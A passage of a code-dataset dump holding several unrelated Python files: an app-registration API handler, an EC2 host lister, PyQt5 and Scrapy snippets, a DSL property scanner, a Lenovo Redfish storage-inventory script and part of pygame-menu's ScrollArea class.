data[\"is_actv\"].lower() == \"true\"\n is_admn = False if \"is_admn\" not in data else data[\"is_admn\"].lower() == \"true\"\n\n datastore.register_application(data[\"app_id\"], data[\"name\"], data[\"pub_key\"], is_actv, is_admn)\n\n self.response.write(json.dumps(response_data))\n\n def validate(self, response_data, data):\n if \"app_id\" not in data or not data[\"app_id\"]:\n response_data[\"status\"] = 400\n response_data[\"error\"] = \"app_id is required.\"\n return False\n if \"name\" not in data or not data[\"name\"]:\n response_data[\"status\"] = 400\n response_data[\"error\"] = \"name is required.\"\n return False\n if \"pub_key\" not in data or not data[\"pub_key\"]:\n response_data[\"status\"] = 400\n response_data[\"error\"] = \"pub_key is required.\"\n return False\n\n return True\n","sub_path":"src/manager/manager_api.py","file_name":"manager_api.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"390701918","text":"# uncompyle6 version 3.6.7\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.8.2 (tags/v3.8.2:7b3ab59, Feb 25 2020, 23:03:10) [MSC v.1916 64 bit (AMD64)]\n# Embedded file name: /Users/silver/Projects/Public/cloud_ssh_config/cloud_ssh_config/cloud/aws.py\n# Compiled at: 2018-10-24 05:58:08\nimport boto3\n\nclass cloud:\n\n def get_hosts(self):\n client = boto3.client('ec2')\n instances = client.describe_instances(Filters=[\n {'Name': 'tag:Name', \n 'Values': [\n '*']},\n {'Name': 'instance-state-name', \n 'Values': [\n 'running']}], MaxResults=100)\n del client\n hosts = {}\n for host in instances['Reservations']:\n if 'PublicIpAddress' in host['Instances'][0]:\n for tag in host['Instances'][0]['Tags']:\n if tag['Key'] == 'Name':\n hosts.update({tag['Value']: host['Instances'][0]['PublicIpAddress']})\n\n return hosts","sub_path":"pycfiles/cloud_storage-1.5.2-py3-none-any/aws.py","file_name":"aws.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"196433339","text":"from PyQt5 import QtWidgets\nfrom .framedata import FrameData\nfrom .frameresult 
import FrameResult\n\nclass FrameMain(QtWidgets.QWidget):\n def __init__(self, parent=None):\n super(FrameMain, self).__init__(parent)\n\n vbox = QtWidgets.QVBoxLayout()\n self.setLayout(vbox)\n\n vbox.addWidget(FrameData())\n vbox.addWidget(FrameResult())\n","sub_path":"gui/frames/framemain.py","file_name":"framemain.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"484855691","text":"def get_next_char(model, initial_text, chars_window, char_to_index, index_to_char):\n \t# Initialize the X vector with zeros\n X = initialize_X(initial_text, chars_window, char_to_index)\n \n # Get next character using the model\n next_char = predict_next_char(model, X, index_to_char)\n\t\n return next_char\n\n# Define context sentence and print the generated text\ninitial_text = \"I am not insane, \"\nprint(\"Next character: {0}\".format(get_next_char(model, initial_text, 20, char_to_index, index_to_char)))\n","sub_path":"Datacamp/Deep Learning for NLP in Python/Recurrent Neural Networks for Language Modeling in Python/chapter-4 ex-3.py","file_name":"chapter-4 ex-3.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"397653129","text":"########\n# Copyright (c) 2014 GigaSpaces Technologies Ltd. All rights reserved\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# * See the License for the specific language governing permissions and\n# * limitations under the License.\n\n\nNODE_TEMPLATE_SCOPE = 'node_template'\nNODE_TEMPLATE_RELATIONSHIP_SCOPE = 'node_template_relationship'\nOUTPUTS_SCOPE = 'outputs'\n\n\ndef scan_properties(value, handler, scope=None, context=None, path=''):\n \"\"\"\n Scans properties dict recursively and applies the provided handler\n method for each property.\n\n The handler method should have the following signature:\n def handler(dictionary, key, scope, context, value, path):\n\n * dictionary - the dictionary the property belongs to.\n * key - the name of the property.\n * value - the value of the property.\n * scope - scope of the operation (string).\n * context - scanner context (i.e. 
actual node template).\n * path - current property path.\n\n :param value: The properties container (dict/list).\n :param handler: A method for applying for to each property.\n :param path: The properties base path (for debugging purposes).\n \"\"\"\n if isinstance(value, dict):\n for k, v in value.iteritems():\n current_path = '{0}.{1}'.format(path, k)\n handler(value, k, v, scope, context, current_path)\n scan_properties(v, handler,\n scope=scope,\n context=context,\n path=current_path)\n elif isinstance(value, list):\n for item in value:\n scan_properties(item, handler,\n scope=scope,\n context=context,\n path=path)\n\n\ndef _scan_operations(operations, handler, scope=None, context=None, path=''):\n for name, definition in operations.iteritems():\n if isinstance(definition, dict) and 'properties' in definition:\n scan_properties(definition['properties'],\n handler,\n scope=scope,\n context=context,\n path='{0}.{1}.properties'.format(path, name))\n\n\ndef scan_node_operation_properties(node_template, handler):\n _scan_operations(node_template['operations'],\n handler,\n scope=NODE_TEMPLATE_SCOPE,\n context=node_template,\n path='{0}.operations'.format(node_template['name']))\n for r in node_template.get('relationships', []):\n context = {'node_template': node_template, 'relationship': r}\n _scan_operations(r.get('source_operations', {}),\n handler,\n scope=NODE_TEMPLATE_RELATIONSHIP_SCOPE,\n context=context,\n path='{0}.{1}'.format(node_template['name'],\n r['type']))\n _scan_operations(r.get('target_operations', {}),\n handler,\n scope=NODE_TEMPLATE_RELATIONSHIP_SCOPE,\n context=context,\n path='{0}.{1}'.format(node_template['name'],\n r['type']))\n\n\ndef scan_service_template(plan, handler):\n for node_template in plan.node_templates:\n scan_properties(node_template['properties'],\n handler,\n scope=NODE_TEMPLATE_SCOPE,\n context=node_template,\n path='{0}.properties'.format(\n node_template['name']))\n\n scan_node_operation_properties(node_template, handler)\n for output_name, output in plan.outputs.iteritems():\n scan_properties(output,\n handler,\n scope=OUTPUTS_SCOPE,\n context=plan.outputs,\n path='outputs.{0}'.format(output_name))\n","sub_path":"dsl_parser/scan.py","file_name":"scan.py","file_ext":"py","file_size_in_byte":4410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"518358827","text":"###\n#\n# Lenovo Redfish examples - Get the storage information\n#\n# Copyright Notice:\n#\n# Copyright 2018 Lenovo Corporation\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
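A small self-contained demonstration of `scan_properties` with a print handler; the sample dictionary is invented, but the handler signature matches the one documented above:

def print_handler(dictionary, key, value, scope, context, path):
    # Report only leaf values; scan_properties recurses into containers itself.
    if not isinstance(value, (dict, list)):
        print('{0} = {1!r} (scope={2})'.format(path, value, scope))

sample = {'server': {'ip': '10.0.0.1', 'ports': [{'http': 80}]}}
scan_properties(sample, print_handler, scope=NODE_TEMPLATE_SCOPE, path='node')
# node.server.ip = '10.0.0.1' (scope=node_template)
# node.server.ports.http = 80 (scope=node_template)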
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n###\n\n\nimport sys\nimport json\nimport redfish\nimport lenovo_utils as utils\n\n\ndef get_storage_info(ip, login_account, login_password, system_id):\n    \"\"\"Get storage inventory \n    :params ip: BMC IP address\n    :type ip: string\n    :params login_account: BMC user name\n    :type login_account: string\n    :params login_password: BMC user password\n    :type login_password: string\n    :params system_id: ComputerSystem instance id(None: first instance, All: all instances)\n    :type system_id: None or string\n    :returns: returns storage inventory when succeeded or error message when failed\n    \"\"\"\n    result = {}\n    login_host = \"https://\" + ip\n    try:\n        # Connect using the BMC address, account name, and password\n        # Create a REDFISH object\n        REDFISH_OBJ = redfish.redfish_client(base_url=login_host, username=login_account,\n                                             password=login_password, default_prefix='/redfish/v1')\n        # Login into the server and create a session\n        REDFISH_OBJ.login(auth=\"session\")\n    except:\n        result = {'ret': False, 'msg': \"Please check the username, password, IP is correct\"}\n        return result\n    storage_details = []\n    # GET the ComputerSystem resource\n    system = utils.get_system_url(\"/redfish/v1\", system_id, REDFISH_OBJ)\n    if not system:\n        result = {'ret': False, 'msg': \"This system id does not exist or system member is None\"}\n        REDFISH_OBJ.logout()\n        return result\n    for i in range(len(system)):\n        system_url = system[i]\n        response_system_url = REDFISH_OBJ.get(system_url, None)\n        if response_system_url.status == 200:\n            # GET the Storage resources from the ComputerSystem resource\n            if \"Storage\" in response_system_url.dict:\n                storage_url = response_system_url.dict[\"Storage\"][\"@odata.id\"]\n            else:\n                storage_url = response_system_url.dict[\"SimpleStorage\"][\"@odata.id\"]\n            response_storage_url = REDFISH_OBJ.get(storage_url, None)\n            if response_storage_url.status == 200:\n                storage_count = response_storage_url.dict[\"Members@odata.count\"]\n                storage = 0\n                for nic in range(0, storage_count):\n                    storage_x_url = response_storage_url.dict[\"Members\"][nic][\"@odata.id\"]\n                    response_storage_x_url = REDFISH_OBJ.get(storage_x_url, None)\n                    if response_storage_x_url.status == 200:\n                        storage = {}\n                        Storage_id = response_storage_x_url.dict[\"Id\"]\n                        Name = response_storage_x_url.dict[\"Name\"]\n                        storage['Id'] = Storage_id\n                        storage['Name'] = Name\n                        if \"Devices\" in response_storage_x_url.dict:\n                            Devices_list = response_storage_x_url.dict['Devices']\n                            for storage_info in Devices_list:\n                                Manufacturer = storage_info['Manufacturer']\n                                Model = storage_info['Model']\n                                CapacityBytes = storage_info['CapacityBytes']\n                                Devies_Name = storage_info['Name']\n                                storage['Manufacturer'] = Manufacturer\n                                storage['Model'] = Model\n                                storage['CapacityBytes'] = CapacityBytes\n                                storage['Devies_Name'] = Devies_Name\n                            storage_details.append(storage)\n                            continue\n                        controller_count = response_storage_x_url.dict[\"StorageControllers@odata.count\"]\n                        controller = 0\n                        # GET the StorageControllers instances resources from each of the Storage resources\n                        storage_list = []\n                        for controller in range(0, controller_count):\n                            storage_controller = {}\n                            Controller = controller\n                            Manufacturer = response_storage_x_url.dict[\"StorageControllers\"][controller][\"Manufacturer\"]\n                            Model = response_storage_x_url.dict[\"StorageControllers\"][controller][\"Model\"]\n                            SerialNumber = response_storage_x_url.dict[\"StorageControllers\"][controller][\"SerialNumber\"]\n                            
FirmwareVersion = response_storage_x_url.dict[\"StorageControllers\"][controller][\n                                \"FirmwareVersion\"]\n                            PartNumber = response_storage_x_url.dict[\"StorageControllers\"][controller][\"PartNumber\"]\n                            DurableNameFormat = response_storage_x_url.dict[\"StorageControllers\"][controller][\"Identifiers\"][0][\n                                \"DurableNameFormat\"]\n                            DurableName = response_storage_x_url.dict[\"StorageControllers\"][controller][\"Identifiers\"][0][\"DurableName\"]\n                            storage_controller[\"Manufacturer\"] = Manufacturer\n                            storage_controller[\"Model\"] = Model\n                            storage_controller[\"SerialNumber\"] = SerialNumber\n                            storage_controller[\"FirmwareVersion\"] = FirmwareVersion\n                            storage_controller[\"PartNumber\"] = PartNumber\n                            storage_controller[\"DurableNameFormat\"] = DurableNameFormat\n                            storage_controller[\"DurableName\"] = DurableName\n                            storage_list.append(storage_controller)\n                        storage['storage_controller'] = storage_list\n                        storage_details.append(storage)\n                    else:\n                        result = {'ret': False, 'msg': \"response_storage_x_url code %s\" % response_storage_x_url.status}\n                        REDFISH_OBJ.logout()\n                        return result\n            else:\n                result = {'ret': False, 'msg': \"response storage url Error code %s\" % response_storage_url.status}\n                REDFISH_OBJ.logout()\n\n        else:\n            result = {'ret': False, 'msg': \"response_system_url Error code %s\" % response_system_url.status}\n            REDFISH_OBJ.logout()\n            return result\n\n    result['ret'] = True\n    result['entries'] = storage_details\n    # Logout of the current session\n    REDFISH_OBJ.logout()\n    return result\n\n\nif __name__ == '__main__':\n    # Get parameters from config.ini and/or command line\n    argget = utils.create_common_parameter_list()\n    args = argget.parse_args()\n    parameter_info = utils.parse_parameter(args)\n    \n    # Get connection info from the parameters user specified\n    ip = parameter_info['ip']\n    login_account = parameter_info[\"user\"]\n    login_password = parameter_info[\"passwd\"]\n    system_id = parameter_info['sysid']\n    \n    # Get storage inventory and check result\n    result = get_storage_info(ip, login_account, login_password, system_id)\n    if result['ret'] is True:\n        del result['ret']\n        sys.stdout.write(json.dumps(result['entries'], sort_keys=True, indent=2))\n    else:\n        sys.stderr.write(result['msg'])","sub_path":"examples/get_storage_inventory.py","file_name":"get_storage_inventory.py","file_ext":"py","file_size_in_byte":7908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"}
{"seq_id":"339550358","text":"from scrapy.item import Item, Field\n\n\nclass Website(Item):\n\n    name = Field()\n    description = Field()\n    url = Field()\n\nclass GoogleNews(Item):\n\n    raw_html_tr = Field()\n    title = Field()\n    press = Field()\n    time = Field()\n    url = Field()\n    img_url = Field()\n    #tgt_html = Field()\n    tgt_url = Field()\n    abstract = Field()\n    news_id = Field()\n    keywords = Field()\n\nclass GoogleSearch(Item):\n    name = Field()\n    votes = Field()\n","sub_path":"dirbot/items.py","file_name":"items.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"}
{"seq_id":"149091535","text":"\"\"\"\npygame-menu\nhttps://github.com/ppizarror/pygame-menu\n\nSCROLLAREA\nScrollArea class to manage scrolling in Menu.\n\nLicense:\n-------------------------------------------------------------------------------\nThe MIT License (MIT)\nCopyright 2017-2021 Pablo Pizarro R. 
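Note that get_storage_info indexes optional Redfish properties directly (for example ["Identifiers"][0]["DurableName"]), which raises KeyError on BMCs that omit them. A hedged variant using dict.get with placeholder defaults (the "N/A" fallbacks are an assumption; the field names come from the script):

def safe_controller_info(controller_dict):
    # Tolerate missing optional Redfish properties instead of raising KeyError.
    identifiers = controller_dict.get("Identifiers") or [{}]
    return {
        "Manufacturer": controller_dict.get("Manufacturer", "N/A"),
        "Model": controller_dict.get("Model", "N/A"),
        "SerialNumber": controller_dict.get("SerialNumber", "N/A"),
        "FirmwareVersion": controller_dict.get("FirmwareVersion", "N/A"),
        "PartNumber": controller_dict.get("PartNumber", "N/A"),
        "DurableNameFormat": identifiers[0].get("DurableNameFormat", "N/A"),
        "DurableName": identifiers[0].get("DurableName", "N/A"),
    }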
@ppizarror\n\nPermission is hereby granted, free of charge, to any person obtaining a\ncopy of this software and associated documentation files (the \"Software\"),\nto deal in the Software without restriction, including without limitation\nthe rights to use, copy, modify, merge, publish, distribute, sublicense,\nand/or sell copies of the Software, and to permit persons to whom the Software\nis furnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,\nWHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN\nCONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n-------------------------------------------------------------------------------\n\"\"\"\n\n__all__ = ['ScrollArea', 'get_scrollbars_from_position']\n\nimport pygame\nimport pygame_menu\nimport pygame_menu.locals as _locals\nfrom pygame_menu._decorator import Decorator\nfrom pygame_menu.utils import make_surface, assert_color, assert_position\nfrom pygame_menu.widgets import ScrollBar, MenuBar\n\nfrom pygame_menu._types import ColorType, Union, NumberType, Tuple, List, Dict, \\\n    Tuple2NumberType, Optional, Tuple2IntType\n\n\ndef get_scrollbars_from_position(position: str) -> Union[str, Tuple[str, str], Tuple[str, str, str, str]]:\n    \"\"\"\n    Return the scrollbars from the given position.\n    Raises ``ValueError`` if invalid position.\n\n    :param position: Position\n    :return: Scrollbars\n    \"\"\"\n    if position in (_locals.POSITION_EAST, _locals.POSITION_SOUTH, _locals.POSITION_WEST, _locals.POSITION_NORTH):\n        return position\n    elif position == _locals.POSITION_NORTHWEST:\n        return _locals.POSITION_NORTH, _locals.POSITION_WEST\n    elif position == _locals.POSITION_NORTHEAST:\n        return _locals.POSITION_NORTH, _locals.POSITION_EAST\n    elif position == _locals.POSITION_SOUTHWEST:\n        return _locals.POSITION_SOUTH, _locals.POSITION_WEST\n    elif position == _locals.POSITION_SOUTHEAST:\n        return _locals.POSITION_SOUTH, _locals.POSITION_EAST\n    elif position == _locals.SCROLLAREA_POSITION_FULL:\n        return _locals.POSITION_SOUTH, _locals.POSITION_EAST, _locals.POSITION_WEST, _locals.POSITION_NORTH\n    elif position == _locals.SCROLLAREA_POSITION_BOTH_HORIZONTAL:\n        return _locals.POSITION_SOUTH, _locals.POSITION_NORTH\n    elif position == _locals.SCROLLAREA_POSITION_BOTH_VERTICAL:\n        return _locals.POSITION_EAST, _locals.POSITION_WEST\n    elif position == _locals.POSITION_CENTER:\n        raise ValueError('cannot init scrollbars from center position')\n    else:\n        raise ValueError('unknown ScrollArea position')\n\n\nSCROLL_VERTICAL = _locals.ORIENTATION_VERTICAL\nSCROLL_HORIZONTAL = _locals.ORIENTATION_HORIZONTAL\n\n\nclass ScrollArea(object):\n    \"\"\"\n    The ScrollArea class provides a scrolling view managing up to 4 scroll bars.\n\n    A scroll area is used to display the contents of a child surface (``world``).\n    If the surface exceeds the size of the drawing surface, the view provides\n    scroll bars so that the entire area of the child surface can be viewed.\n\n    .. note::\n\n        See :py:mod:`pygame_menu.locals` for valid ``scrollbars`` and\n        ``shadow_position`` values.\n\n    .. 
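The mapping implemented by get_scrollbars_from_position can be sanity-checked directly; corner positions expand to two scrollbars and SCROLLAREA_POSITION_FULL to all four:

import pygame_menu.locals as _locals
from pygame_menu.scrollarea import get_scrollbars_from_position

assert get_scrollbars_from_position(_locals.POSITION_SOUTHEAST) == \
    (_locals.POSITION_SOUTH, _locals.POSITION_EAST)
assert len(get_scrollbars_from_position(_locals.SCROLLAREA_POSITION_FULL)) == 4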
note::\n\n ScrollArea cannot be copied or deepcopied.\n\n :param area_width: Width of scrollable area (px)\n :param area_height: Height of scrollable area (px)\n :param area_color: Background color, it can be a color or an image\n :param cursor: Scrollbar cursors\n :param menubar: Menubar for style compatibility\n :param extend_x: Px to extend the surface in x axis (px) from left\n :param extend_y: Px to extend the surface in y axis (px) from top\n :param scrollbar_color: Scrollbars color\n :param scrollbar_slider_color: Color of the sliders\n :param scrollbar_slider_pad: Space between slider and scrollbars borders\n :param scrollbar_thick: Scrollbars thickness\n :param scrollbars: Positions of the scrollbars\n :param shadow: Indicate if a shadow is drawn on each scrollbar\n :param shadow_color: Color of the shadow\n :param shadow_offset: Offset of shadow\n :param shadow_position: Position of shadow\n :param world: Surface to draw and scroll\n \"\"\"\n _bg_surface: Optional['pygame.Surface']\n _decorator: 'Decorator'\n _extend_x: int\n _extend_y: int\n _menu: Optional['pygame_menu.Menu']\n _menubar: 'pygame_menu.widgets.MenuBar'\n _rect: 'pygame.Rect'\n _scrollbar_positions: Tuple[str, ...]\n _scrollbar_thick: NumberType\n _scrollbars: List['ScrollBar']\n _view_rect: 'pygame.Rect'\n _world: 'pygame.Surface'\n\n def __init__(self,\n area_width: int,\n area_height: int,\n area_color: Optional[Union[ColorType, 'pygame_menu.BaseImage']] = None,\n cursor: Optional[Union[int, 'pygame.cursors.Cursor']] = None,\n extend_x: int = 0,\n extend_y: int = 0,\n menubar: Optional['MenuBar'] = None,\n scrollbar_color: ColorType = (235, 235, 235),\n scrollbar_slider_color: ColorType = (200, 200, 200),\n scrollbar_slider_pad: NumberType = 0,\n scrollbar_thick: NumberType = 20,\n scrollbars: Union[str, Tuple[str, ...]] = get_scrollbars_from_position(_locals.POSITION_SOUTHEAST),\n shadow: bool = False,\n shadow_color: ColorType = (0, 0, 0),\n shadow_offset: NumberType = 2,\n shadow_position: str = _locals.POSITION_SOUTHEAST,\n world: Optional['pygame.Surface'] = None\n ) -> None:\n assert isinstance(area_width, int)\n assert isinstance(area_height, int)\n assert isinstance(scrollbar_slider_pad, (int, float))\n assert isinstance(scrollbar_thick, (int, float))\n assert isinstance(shadow, bool)\n assert isinstance(shadow_offset, (int, float))\n assert isinstance(world, (pygame.Surface, type(None)))\n\n assert_color(scrollbar_color)\n assert_color(scrollbar_slider_color)\n assert_color(shadow_color)\n assert_position(shadow_position)\n\n assert area_width > 0 and area_height > 0, \\\n 'area size must be greater than zero'\n\n self._bg_surface = None\n self._decorator = Decorator(self)\n self._rect = pygame.Rect(0, 0, int(area_width), int(area_height))\n self._scrollbar_positions = tuple(set(scrollbars)) # Ensure unique\n self._scrollbar_thick = scrollbar_thick\n self._scrollbars = []\n self._world = world\n\n self._extend_x = extend_x\n self._extend_y = extend_y\n self._menubar = menubar\n\n if area_color:\n self._bg_surface = make_surface(width=area_width + extend_x,\n height=area_height + self._extend_y)\n if isinstance(area_color, pygame_menu.BaseImage):\n area_color.draw(surface=self._bg_surface, area=self._bg_surface.get_rect())\n else:\n self._bg_surface.fill(area_color)\n\n self._view_rect = self.get_view_rect()\n\n for pos in self._scrollbar_positions:\n assert_position(pos)\n\n if pos == _locals.POSITION_EAST or pos == _locals.POSITION_WEST:\n sbar = ScrollBar(\n length=self._view_rect.height,\n 
values_range=(0, max(1, self.get_hidden_height())),\n orientation=SCROLL_VERTICAL,\n slider_pad=scrollbar_slider_pad,\n slider_color=scrollbar_slider_color,\n page_ctrl_thick=scrollbar_thick,\n page_ctrl_color=scrollbar_color,\n onchange=self._on_vertical_scroll\n )\n else:\n sbar = ScrollBar(\n length=self._view_rect.width,\n values_range=(0, max(1, self.get_hidden_width())),\n slider_pad=scrollbar_slider_pad,\n slider_color=scrollbar_slider_color,\n page_ctrl_thick=scrollbar_thick,\n page_ctrl_color=scrollbar_color,\n onchange=self._on_horizontal_scroll\n )\n sbar.set_shadow(\n enabled=shadow,\n color=shadow_color,\n position=shadow_position,\n offset=shadow_offset\n )\n sbar.set_controls(joystick=False)\n sbar.set_cursor(cursor=cursor)\n\n self._scrollbars.append(sbar)\n\n self._apply_size_changes()\n\n # Menu reference\n self._menu = None\n\n def __copy__(self) -> 'ScrollArea':\n \"\"\"\n Copy method.\n\n :return: Raises copy exception\n \"\"\"\n raise _ScrollAreaCopyException('ScrollArea class cannot be copied')\n\n def __deepcopy__(self, memodict: Dict) -> 'ScrollArea':\n \"\"\"\n Deepcopy method.\n\n :param memodict: Memo dict\n :return: Raises copy exception\n \"\"\"\n raise _ScrollAreaCopyException('ScrollArea class cannot be copied')\n\n def force_menu_surface_update(self) -> 'ScrollArea':\n \"\"\"\n Forces menu surface update after next rendering call.\n\n .. note ::\n\n This method is expensive, as menu surface update forces re-rendering of\n all widgets (because them can change in size, position, etc...).\n\n :return: Self reference\n \"\"\"\n if self._menu is not None:\n self._menu._widgets_surface_need_update = True\n return self\n\n def force_menu_surface_cache_update(self) -> 'ScrollArea':\n \"\"\"\n Forces menu surface cache to update after next drawing call.\n This also updates widget decoration.\n\n .. 
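As the __copy__/__deepcopy__ overrides above enforce, a ScrollArea cannot be duplicated. A minimal sketch (default arguments assumed; pygame may need to be initialized first):

import copy
import pygame
import pygame_menu

pygame.init()  # ScrollBar widget construction may require an initialized pygame

area = pygame_menu.scrollarea.ScrollArea(area_width=300, area_height=200)
try:
    copy.copy(area)
except Exception as exc:  # the module-private _ScrollAreaCopyException
    print(type(exc).__name__, '-', exc)  # ... ScrollArea class cannot be copied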
note::\n\n This method only updates the surface cache, without forcing re-rendering\n of all Menu widgets as :py:meth:`pygame_menu.widgets.core.widget.Widget.force_menu_surface_update`\n does.\n\n :return: Self reference\n \"\"\"\n if self._menu is not None:\n self._menu._widget_surface_cache_need_update = True\n self._decorator.force_cache_update()\n return self\n\n def _apply_size_changes(self) -> None:\n \"\"\"\n Apply size changes to scrollbar.\n\n :return: None\n \"\"\"\n self._view_rect = self.get_view_rect()\n for sbar in self._scrollbars:\n pos = self._scrollbar_positions[self._scrollbars.index(sbar)]\n\n dsize, dx, dy = 0, 0, 0\n if self._menubar is not None:\n dsize, (dx, dy) = self._menubar.get_scrollbar_style_change(pos)\n\n if pos == _locals.POSITION_WEST:\n sbar.set_position(self._view_rect.left - self._scrollbar_thick + dx, self._view_rect.top + dy)\n elif pos == _locals.POSITION_EAST:\n sbar.set_position(self._view_rect.right + dx, self._view_rect.top + dy)\n elif pos == _locals.POSITION_NORTH:\n sbar.set_position(self._view_rect.left + dx, self._view_rect.top - self._scrollbar_thick + dy)\n elif pos == _locals.POSITION_SOUTH: # South\n sbar.set_position(self._view_rect.left + dx, self._view_rect.bottom + dy)\n elif pos == _locals.POSITION_CENTER:\n raise ValueError('center position cannot be applied to scrollbar')\n else:\n raise ValueError('unknown position')\n\n if pos in (_locals.POSITION_NORTH, _locals.POSITION_SOUTH) \\\n and self.get_hidden_width() != sbar.get_maximum() \\\n and self.get_hidden_width() != 0:\n sbar.set_length(self._view_rect.width + dsize)\n sbar.set_maximum(self.get_hidden_width())\n sbar.set_page_step(self._view_rect.width * self.get_hidden_width() /\n (self._view_rect.width + self.get_hidden_width()))\n\n elif pos in (_locals.POSITION_EAST, _locals.POSITION_WEST) \\\n and self.get_hidden_height() != sbar.get_maximum() \\\n and self.get_hidden_height() != 0:\n sbar.set_length(self._view_rect.height + dsize)\n sbar.set_maximum(self.get_hidden_height())\n sbar.set_page_step(self._view_rect.height * self.get_hidden_height() /\n (self._view_rect.height + self.get_hidden_height()))\n\n def draw(self, surface: 'pygame.Surface') -> 'ScrollArea':\n \"\"\"\n Draw the scrollarea.\n\n :param surface: Surface to render the area\n :return: Self reference\n \"\"\"\n if not self._world:\n return self\n\n # Background surface already has previous decorators\n if self._bg_surface:\n surface.blit(self._bg_surface, (self._rect.x - self._extend_x, self._rect.y - self._extend_y))\n\n for sbar in self._scrollbars:\n if sbar.get_orientation() == SCROLL_HORIZONTAL:\n if self.get_hidden_width():\n sbar.draw(surface)\n else:\n if self.get_hidden_height():\n sbar.draw(surface)\n\n # noinspection PyTypeChecker\n surface.blit(self._world, self._view_rect.topleft, (self.get_offsets(), self._view_rect.size))\n self._decorator.draw_post(surface)\n return self\n\n def get_hidden_width(self) -> int:\n \"\"\"\n Return the total width out of the bounds of the viewable area.\n Zero is returned if the world width is lower than the viewable area.\n\n :return: Hidden width (px)\n \"\"\"\n if not self._world:\n return 0\n return int(max(0, self._world.get_width() - self._view_rect.width))\n\n def get_hidden_height(self) -> int:\n \"\"\"\n Return the total height out of the bounds of the viewable area.\n Zero is returned if the world height is lower than the viewable area.\n\n :return: Hidden height (px)\n \"\"\"\n if not self._world:\n return 0\n return int(max(0, self._world.get_height() 
- self._view_rect.height))\n\n def get_offsets(self) -> Tuple2IntType:\n \"\"\"\n Return the offset introduced by the scrollbars in the world.\n\n :return: ScrollArea offset *(x, y)*\n \"\"\"\n offsets = [0, 0]\n for sbar in self._scrollbars:\n if sbar.get_orientation() == SCROLL_HORIZONTAL:\n if self.get_hidden_width():\n offsets[0] = sbar.get_value()\n else:\n if self.get_hidden_height():\n offsets[1] = sbar.get_value()\n return offsets[0], offsets[1]\n\n def get_rect(self) -> 'pygame.Rect':\n \"\"\"\n Return the :py:class:`pygame.Rect` object of the ScrollArea.\n\n :return: Pygame.Rect object\n \"\"\"\n return self._rect.copy()\n\n def get_scrollbar_thickness(self, orientation: str, real: bool = False) -> int:\n \"\"\"\n Return the scroll thickness of the area. If it's hidden return zero.\n\n :param orientation: Orientation of the scroll\n :param real: If ``True`` returns the real thickness depending if it is shown or not\n :return: Thickness (px)\n \"\"\"\n assert isinstance(real, bool)\n if real:\n for sbar in self._scrollbars:\n if sbar.get_orientation() == orientation:\n return sbar.get_thickness()\n if orientation == SCROLL_HORIZONTAL:\n return int(self._rect.height - self._view_rect.height)\n elif orientation == SCROLL_VERTICAL:\n return int(self._rect.width - self._view_rect.width)\n return 0\n\n def get_view_rect(self) -> 'pygame.Rect':\n \"\"\"\n Subtract width of scrollbars from area with the given size and return\n the viewable area.\n\n The viewable area depends on the world size, because scroll bars may\n or may not be displayed.\n\n :return: View rect object\n \"\"\"\n rect = pygame.Rect(self._rect)\n\n # No scrollbar: area is large enough to display world\n if not self._world or (self._world.get_width() <= self._rect.width\n and self._world.get_height() <= self._rect.height):\n return rect\n\n # All scrollbars: the world is too large\n if self._world.get_height() > self._rect.height \\\n and self._world.get_width() > self._rect.width:\n if _locals.POSITION_WEST in self._scrollbar_positions:\n rect.left += self._scrollbar_thick\n rect.width -= self._scrollbar_thick\n if _locals.POSITION_EAST in self._scrollbar_positions:\n rect.width -= self._scrollbar_thick\n if _locals.POSITION_NORTH in self._scrollbar_positions:\n rect.top += self._scrollbar_thick\n rect.height -= self._scrollbar_thick\n if _locals.POSITION_SOUTH in self._scrollbar_positions:\n rect.height -= self._scrollbar_thick\n return rect\n\n # Calculate the maximum variations introduces by the scrollbars\n bars_total_width = 0\n bars_total_height = 0\n if _locals.POSITION_NORTH in self._scrollbar_positions:\n bars_total_height += self._scrollbar_thick\n if _locals.POSITION_SOUTH in self._scrollbar_positions:\n bars_total_height += self._scrollbar_thick\n if _locals.POSITION_WEST in self._scrollbar_positions:\n bars_total_width += self._scrollbar_thick\n if _locals.POSITION_EAST in self._scrollbar_positions:\n bars_total_width += self._scrollbar_thick\n\n if 